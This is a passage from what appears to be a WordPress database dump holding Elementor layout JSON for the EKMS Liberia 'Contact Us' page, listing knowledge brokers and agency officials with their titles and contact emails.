href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19731,2884,'_elementor_edit_mode','builder'),(19732,2884,'_elementor_template_type','wp-page'),(19733,2884,'_elementor_version','2.7.5'),(19734,2884,'_wp_page_template','default'),(19735,2884,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a 